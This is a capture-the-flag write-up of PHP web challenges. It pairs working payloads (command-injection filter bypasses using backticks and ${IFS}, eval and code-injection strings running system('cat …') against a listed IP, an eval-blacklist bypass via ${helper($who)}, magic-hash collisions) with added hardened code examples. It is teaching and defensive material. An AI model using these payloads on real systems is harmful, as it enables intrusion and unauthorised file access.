[WP][web] 中学生CTF | Web challenge write-ups

Challenges covered:
$_GET
$_POST
$_COOKIE
SVN_Leaked
List It
change_and_download
Guess Random
Guess Random 2
Ping
Easy RCE
Code Inject
Eval is Evil

$_GET

Source:

 <?php 
    show_source(__FILE__);
    include 'config.php';
    if(!isset($_GET['args'])){
        die();
    } 
    if ($_GET['args'] === "give_me_flag") {
        echo file_get_contents($flag_of_get); //flag
    }
?> 

It checks the $_GET parameter: if the parameter is named args and its value is give_me_flag, it prints the flag.

$_POST

Source:

<?php 
    show_source(__FILE__);
    include 'config.php';
    if(!isset($_POST['args'])){
        die();
    } 
    if ($_POST['args'] === "give_me_flag") {
        echo file_get_contents($flag_of_post); //flag
    }
?>

Same as the previous level, except GET becomes POST. Send the parameter with Firefox's HackBar to get the flag.

$_COOKIE

Visiting it directly shows: You are not admin, and the page source has no hints.

Capture the request and have a look:

There is a cookie: level=0. Change it to 1 and try again.

Got the flag.
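
The level cookie is owned by the client, which is the whole bug in this level. The following is an added example (not the challenge's own code) that puts the trusted-cookie check next to a server-signed cookie; the cookie names, the $secret value and the function names are assumptions made for the demo.

```php
<?php
// Added example, not the challenge's code: a cookie trusted as-is (the
// pattern of the "$_COOKIE" level) beside an HMAC-signed cookie that the
// server can verify. Cookie names, $secret and function names are assumed.

// Vulnerable: the browser owns the cookie, so "level=1" is one edit away.
function is_admin_unsafe(array $cookies): bool {
    return isset($cookies['level']) && $cookies['level'] === '1';
}

// Hardened: the server issues "<level>.<hmac>"; any edit to the level
// part invalidates the tag, and the secret never leaves the server.
function issue_level_cookie(int $level, string $secret): string {
    $payload = (string)$level;
    $tag = hash_hmac('sha256', $payload, $secret);
    return $payload . '.' . $tag;
}

function is_admin_signed(array $cookies, string $secret): bool {
    if (!isset($cookies['level_signed'])) {
        return false;
    }
    $parts = explode('.', $cookies['level_signed'], 2);
    if (count($parts) !== 2) {
        return false;
    }
    [$payload, $tag] = $parts;
    // Constant-time comparison; never compare MACs with == or ===.
    $expected = hash_hmac('sha256', $payload, $secret);
    if (!hash_equals($expected, $tag)) {
        return false;
    }
    return $payload === '1';
}

// Demo with constructed values (a real secret lives in config, not source).
$secret = 'constructed-demo-secret-change-me';

var_dump(is_admin_unsafe(['level' => '1']));                       // tampered cookie accepted

$cookie = issue_level_cookie(0, $secret);                          // "0.<hmac>"
$forged = '1' . substr($cookie, 1);                                // flip 0 -> 1, keep old tag
var_dump(is_admin_signed(['level_signed' => $cookie], $secret));   // genuine level 0
var_dump(is_admin_signed(['level_signed' => $forged], $secret));   // tag no longer matches
var_dump(is_admin_signed(['level_signed' => issue_level_cookie(1, $secret)], $secret));
```

The signed variant detects the edit the write-up makes (0 to 1) because the tag was computed over "0". In a real application the simpler choice is to keep the privilege level in a server-side session and send the browser only an opaque session id.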

SVN_Leaked

Seeing "SVN" suggests an SVN source-code leak, so scan for it with a tool.

There is a SourceLeakHackerForLinux.py

GitHub project: https://github.com/Err0rzz/SourceLeakHacker

At first I tried all sorts of paths; in the end, simply requesting the .php file directly gave the flag.

List It

Looking at the page source, there is an admin link. Visit it!

After visiting it, I noticed there was another

Clicking it gives the flag. Feels like this one should have been the first warm-up challenge...

change_and_download

The downloaded file's name is in base64-encoded form.

I solved it right away the first time, but when I came back to write this post and tried again, I could not get it to work at all.

A few days later I tried changing the trailing part to ?url=ZG93bmxvYWQucGhw (the base64 encoding of download.php)

That downloaded download.php, and inside it there were three .php files.

You cannot pass ?url=flag.php directly; that shows Access Forbidden!

So pass ?url=ZmxhZy5waHA= instead, and the downloaded file contains the flag.
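
The behaviour above (plain flag.php is refused, its base64 form is served) points at a check applied to the raw parameter before decoding. The following is an added example, not the challenge's download.php: it reproduces that ordering next to a version that canonicalises first and then decides against an allowlist. The parameter name url, the base64 convention and the file name flag.php come from the write-up; the blacklist shape, $base_dir and the allowlist are assumptions.

```php
<?php
// Added example, not the challenge's code: a check that runs before base64
// decoding (assumed shape of the weak endpoint) beside a decode-then-validate
// version. $base_dir, the allowlist and the helper names are assumptions.

// Weak: filters the raw parameter, then decodes, so "flag.php" is only caught
// when it is sent in plain text.
function pick_file_weak(string $url): ?string {
    if (stripos($url, 'flag.php') !== false) {
        return null;                               // "Access Forbidden!"
    }
    $decoded = base64_decode($url, true);          // strict mode: false on bad input
    return $decoded === false ? $url : $decoded;
}

// Hardened: decode first, accept only a bare file name from an allowlist, and
// confirm the resolved path is still inside the download directory.
function pick_file_safe(string $url, string $base_dir, array $allowed): ?string {
    $decoded = base64_decode($url, true);
    $name = $decoded === false ? $url : $decoded;

    // No directories, no traversal: the name must be its own basename.
    if ($name === '' || $name === '.' || $name === '..' || $name !== basename($name)) {
        return null;
    }
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    $root = realpath($base_dir);
    $full = realpath($base_dir . DIRECTORY_SEPARATOR . $name);
    // realpath() resolves symlinks; the result must start with "<root>/".
    if ($root === false || $full === false
        || strncmp($full, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Constructed demo directory with one public file.
$base_dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'download_demo';
@mkdir($base_dir);
file_put_contents($base_dir . DIRECTORY_SEPARATOR . 'readme.txt', "public file\n");
$allowed = ['readme.txt'];

var_dump(pick_file_weak('flag.php'));                  // refused
var_dump(pick_file_weak('ZmxhZy5waHA='));              // decodes to flag.php: slips through

var_dump(pick_file_safe('ZmxhZy5waHA=', $base_dir, $allowed));                    // not on the allowlist
var_dump(pick_file_safe(base64_encode('../../etc/passwd'), $base_dir, $allowed)); // traversal rejected
var_dump(pick_file_safe(base64_encode('readme.txt'), $base_dir, $allowed));       // resolved path served
```

The order of operations is the whole point: any filter that inspects user input must run on the form the application will actually use, after every decoding step, and an allowlist of known file names is far easier to reason about than a blacklist of forbidden ones.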

Guess Random

Looking at the page source, there is a ?debug=true

Adding it reveals the source.

Found extract($_POST): variable overwrite!!

Pass secretKey=1&password=1 and the flag comes back.
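
The payload works because extract($_POST) turns every POST field into a local variable, so the client gets to redefine $secretKey. The following is an added example, not the challenge's source: the check shape (a password compared against a server-generated $secretKey) is inferred from the payload secretKey=1&password=1 and is an assumption, as are the function names.

```php
<?php
// Added example, not the challenge's code: extract() importing request data
// over a server-side secret (assumed shape of the "Guess Random" check),
// beside two ways to keep request data out of local scope.

function check_vulnerable(array $post): bool {
    $secretKey = bin2hex(random_bytes(16));   // unguessable, until it is overwritten
    extract($post);                           // every POST key becomes a local variable
    return isset($password) && $password == $secretKey;
}

// Fix 1: read the one field you need explicitly; never import request data wholesale.
function check_fixed(array $post): bool {
    $secretKey = bin2hex(random_bytes(16));
    $password = (string)($post['password'] ?? '');
    return hash_equals($secretKey, $password);   // strict and constant-time
}

// Fix 2: if extract() must stay, prefix everything so request data lives in its
// own namespace ($req_password, $req_secretKey) and cannot shadow $secretKey.
// EXTR_SKIP would alternatively refuse to overwrite variables that already exist.
function check_prefixed(array $post): bool {
    $secretKey = bin2hex(random_bytes(16));
    extract($post, EXTR_PREFIX_ALL, 'req');
    return isset($req_password) && hash_equals($secretKey, (string)$req_password);
}

// Constructed input: the exact payload from the write-up.
$attack = ['secretKey' => '1', 'password' => '1'];

var_dump(check_vulnerable($attack));   // secret replaced by "1", check passes
var_dump(check_fixed($attack));        // secret untouched
var_dump(check_prefixed($attack));     // secret untouched
```

Grepping a code base for extract($_POST), extract($_GET) and extract($_REQUEST) is a cheap review step; the same class of bug also appears with parse_str() called without its second argument on PHP versions that still allow it.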

Guess Random 2

Visit index.php.bak and download the .bak file:

<?php
    require_once 'flag.php';
    if(isset($_GET['mash']) and isset($_GET['hash'])){
        $res  = sanitize($_GET['mash']);
        $hash = sanitize($_GET['hash']);
        $secretValue = (rand(5,5555)*555+55555555555);

        if(($res != false) and ($hash != false)){
            // loose comparison (==) between a string and the MD5 hex digest
            if($res.$secretValue == md5($_GET['hash'])){
                echo $flag;
            }
            else{
                echo 'Try Again ! ';
            }
        }
        else{
            echo "No!!!";
        }
    }
    else{
        echo "<img src='http://sqlbak.com/blog/wp-content/uploads/2014/02/bak_file.png'>";
    }

    //function
    function sanitize($var){
        // keep only [A-Za-z0-9]; every other character is dropped
        $valideChar = str_split('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789');
        $res = '';

        if(isset($var) and !empty($var)){
            $tmp = str_split($var);
            foreach($tmp as $value){
                if(in_array($value,$valideChar)){
                    $res.=$value;
                }
            }
            return $res;
        }
        else{
            return false;
        }
    }
?>

Two variables come in through $_GET, and each first goes through sanitize(). That function splits the input string into single characters and keeps each one only if it is in $valideChar, then returns the filtered string.

So a normal input string causes no problem; what remains is getting past the MD5 comparison.

We only need the MD5 to start with 0e. When PHP compares with ==, a string of the form 0exxx is parsed as scientific notation, and every 0exx evaluates to 0, so to make the two sides equal we just need a second string whose MD5 starts with 0exxx.

Note that the first parameter is not hashed with MD5, so it has to be passed directly as a string starting with 0e; 32 characters is enough.
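
The root cause is the == between a caller-chosen string and an MD5 hex digest. The following is an added example, not the challenge's code, that shows the loose comparison collapsing for two different "0e" strings and the strict comparisons that close it; the inputs are constructed for the demo.

```php
<?php
// Added example, not the challenge's code: PHP's loose string comparison
// against "0e<digits>" values, beside === and hash_equals(). The inputs are
// constructed; the concatenation mirrors the challenge's $res.$secretValue.

// A well-known input whose md5() hex digest is "0e" followed only by digits.
// PHP treats such a string as a numeric literal in scientific notation,
// and 0 times any power of ten is 0.
$hash_in = '240610708';
$md5 = md5($hash_in);

// Caller-chosen 32-character string of the same "0e<digits>" shape; the
// challenge never hashes this side, it only strips non-alphanumerics.
$res = '0e' . str_repeat('1', 30);

function compare_loose(string $a, string $b): bool  { return $a == $b; }    // numeric if both look numeric
function compare_strict(string $a, string $b): bool { return $a === $b; }   // byte-for-byte
// hash_equals() is strict and constant-time: the right tool for any digest or token.
function compare_hash(string $a, string $b): bool   { return hash_equals($a, $b); }

var_dump(compare_loose($res, $md5));    // both sides read as 0
var_dump(compare_strict($res, $md5));   // different strings
var_dump(compare_hash($res, $md5));     // different strings

// The challenge appends a number to $res before comparing. Appending digits to
// "0e111..." keeps it a numeric string, so the loose comparison still collapses.
$secretValue = rand(5, 5555) * 555 + 55555555555;
var_dump(compare_loose($res . $secretValue, $md5));
var_dump(compare_strict($res . $secretValue, $md5));
```

The practical rule for PHP code that compares hashes, tokens or passwords: never ==, and prefer hash_equals() over === so the comparison is also constant-time. PHP 8 tightened comparisons between numbers and non-numeric strings, but two numeric strings such as these are still compared as numbers, so the "0e" case survives the upgrade.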

Ping

Command injection with a filter to get around. After a few tries: some commands are filtered.

But backticks can still execute commands.

By concatenating strings, the ls command can be built:

127.0.0.1;`a="l";b="s";c=$a$b;$c`

You can see the flag is the string below that starts with flag_.

Build the command the same way to read it:

127.0.0.1;`a="ca";b="t${IFS}fla";c="g_ae8e4cd6ce3b5";d=$a$b$c;$d`

To get around the space filter, you can use:

${IFS}

<  (also filtered here)

$IFS

$IFS$9

in place of the space; since the command here sits inside a string, ${IFS} is the one used.
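
The level's filter blocks words and spaces but still hands the string to a shell, which is why `;`, backticks, $a$b concatenation and ${IFS} all work. The following is an added example, not the challenge's code: the blacklist shape beside a version that validates the target as an IP address and passes it to ping as a single argv element, so no shell ever parses it. The $blocked list, the ping flags and the function names are assumptions; the payloads are the ones from the write-up.

```php
<?php
// Added example, not the challenge's code: word/space blacklist in front of a
// shell command (assumed shape of the "Ping" level) beside an allowlist check
// plus argv-style process launch. $blocked, flags and names are assumptions.

// Vulnerable shape: a blacklist can only name what its author thought of.
// Returns the string that would reach the shell; it is never executed here.
function ping_blacklist(string $host): string {
    $blocked = ['ls', 'cat', ' '];
    foreach ($blocked as $word) {
        if (strpos($host, $word) !== false) {
            return "blocked: $word";
        }
    }
    return 'ping -c 1 ' . $host;     // shell metacharacters are still live in $host
}

// Hardened: accept only a syntactically valid IP address, then build argv.
function ping_command_safe(string $host): ?array {
    if (filter_var($host, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    // Array form: each element is one argument, so ; ` $ and ${IFS} are inert data.
    return ['ping', '-c', '1', $host];
}

// Launch without /bin/sh: proc_open() accepts an argv array on PHP >= 7.4.
function run_ping(string $host): ?string {
    $argv = ping_command_safe($host);
    if ($argv === null) {
        return null;
    }
    $proc = proc_open($argv, [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

// Constructed inputs: a plain address and the write-up's first payload.
$inputs = ['127.0.0.1', '127.0.0.1;`a="l";b="s";c=$a$b;$c`'];
foreach ($inputs as $input) {
    var_dump(ping_blacklist($input));       // the blacklist lets both through
    var_dump(ping_command_safe($input));    // the allowlist rejects the second
}
```

If a shell string is unavoidable (for example a legacy wrapper script), wrap the single user-controlled value with escapeshellarg() after validating it; the validation is what matters, because escaping alone still lets an attacker pick any hostname-shaped value for the command's own option parsing.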

Easy RCE

Looking at the page source, I found:

But passing a value kept failing. On the challenge page there is a hint you can view.

Viewing the hint:

<?php
    eval($_GET['name']."!!!");    
?>

Three !!! are appended after the input, so it produces a syntax error.

Now that the problem is clear, it only needs to be bypassed.

A trailing // comments out the rest of the PHP code:

?name=print_r(scandir('./'));//

?name=print_r(scandir('../../../'));//

?name=system('cat ../../../flag_bfe6335f68be16c1');//

Code Inject

Did this one entirely by following a write-up online, Orz

Click the "don't click me" link to get the source; from it you can see that closing the brace lets you inject code.

http://198.13.45.199:5007/index.php?code=};phpinfo();//

http://198.13.45.199:5007/index.php?code=}system('ls ../../../');//

http://198.13.45.199:5007/index.php?code=}system('cat ../../../flag_f4bb6a070d7d979e');//

Eval is Evil

The source is below. While analyzing it, $who looked special, so I decoded it and found it is flag; together with the helper() function above it, I guessed that helper() is meant to decode $who and turn it into flag.

<?php
highlight_file(__FILE__);


$flag = file_get_contents('/flag_6edb44d39f5479601fb');

$yourinput = $_GET['cmd'];
$funcs_internal = get_defined_functions()['internal'];

function helper($d){
    return base64_decode($d);
}

$who = "ZmxhZw==";

$funcs_extra = array ('eval', 'include', 'require', 'function');
$funny_chars = array ('.', '+','flag', '-', '*', '"', '`', '[', ']', '@', '!', '#', '%', '&', '~');
$variables = array ('_GET', '_POST', '_COOKIE', '_REQUEST', '_SERVER', '_FILES', '_ENV', 'HTTP_ENV_VARS', '_SESSION', 'GLOBALS');


$blacklist = array_merge($funcs_internal, $funcs_extra, $funny_chars, $variables);
$yourbro = "who";


$hacked = false;
$why = "";
foreach ($blacklist as $blacklisted) {
    if (preg_match ('/' . $blacklisted . '/im', $yourinput)) {
        $hacked = true;
        $why = $blacklisted;
        break;
    }
}


if ($hacked) {
    die('Hacker Detected,<br/>Reason: '.$why." !");
} else {
    if(isset($yourinput)){
           @eval("echo " . $yourinput . " ;");
    }else{
        echo "Input your command!";
    }
}

Constructed statement as follows:

You can see that flag is echoed back, but beyond that I could not get any further, Orz...

Later I searched on Google and found that ${helper($who)} can be used.

${} treats whatever is inside as a variable name and evaluates it as a variable, so that does it.
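
Easy RCE, Code Inject and Eval is Evil share one root cause: user text reaches eval(), and a blacklist in front of it cannot enumerate every way PHP can reach a value (here ${...} variable variables, which contain none of the blocked words). The following is an added example, not the challenge's code: the blacklist-around-eval shape beside a dispatcher that maps a command name to a fixed handler and treats the argument purely as data. The handler table, command names and function names are assumptions for the demo.

```php
<?php
// Added example, not the challenge's code: a regex blacklist guarding eval()
// (the shape shared by the three eval levels) beside an allowlist dispatcher.
// $handlers, the command names and the helper names are assumptions.

// Blacklist shape. Entries must go through preg_quote(), otherwise '.' or '+'
// act as regex metacharacters; even escaped, the list only blocks what its
// author anticipated. The eval() itself is deliberately not executed here.
function guarded_eval_unsafe(string $input, array $blacklist): string {
    foreach ($blacklist as $bad) {
        if (preg_match('/' . preg_quote($bad, '/') . '/im', $input)) {
            return "blocked: $bad";
        }
    }
    return 'would eval: echo ' . $input . ' ;';
}

// Hardened: the client chooses a name from a fixed table; the argument is a
// string handed to that handler and is never interpreted as PHP.
function dispatch(string $cmd, string $arg, array $handlers): string {
    if (!preg_match('/\A[a-z_]{1,32}\z/', $cmd) || !isset($handlers[$cmd])) {
        return 'unknown command';
    }
    return (string)$handlers[$cmd]($arg);
}

$handlers = [
    'upper'  => fn(string $s) => strtoupper($s),
    'length' => fn(string $s) => strlen($s),
    'b64'    => fn(string $s) => base64_decode($s, true) === false ? 'invalid base64' : base64_decode($s, true),
];

// Constructed blacklist and the write-up's input: no listed word appears in
// "${helper($who)}", so the blacklist passes it straight to eval().
var_dump(guarded_eval_unsafe('${helper($who)}', ['eval', 'flag', '_GET', 'system']));

// With the dispatcher the same decoded value is just a string result.
var_dump(dispatch('b64', 'ZmxhZw==', $handlers));        // "flag" as data, not a variable name
var_dump(dispatch('${helper($who)}', '', $handlers));    // fails the name check
var_dump(dispatch('system', 'id', $handlers));           // not in the table
```

The dispatcher needs PHP 7.4 or later for the arrow functions. The design point is that the set of reachable behaviour is the keys of $handlers, which can be reviewed in one glance, whereas the set of strings eval() will accept cannot be enumerated at all; a blacklist in front of eval() should be read as a sign that the eval() has to go.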
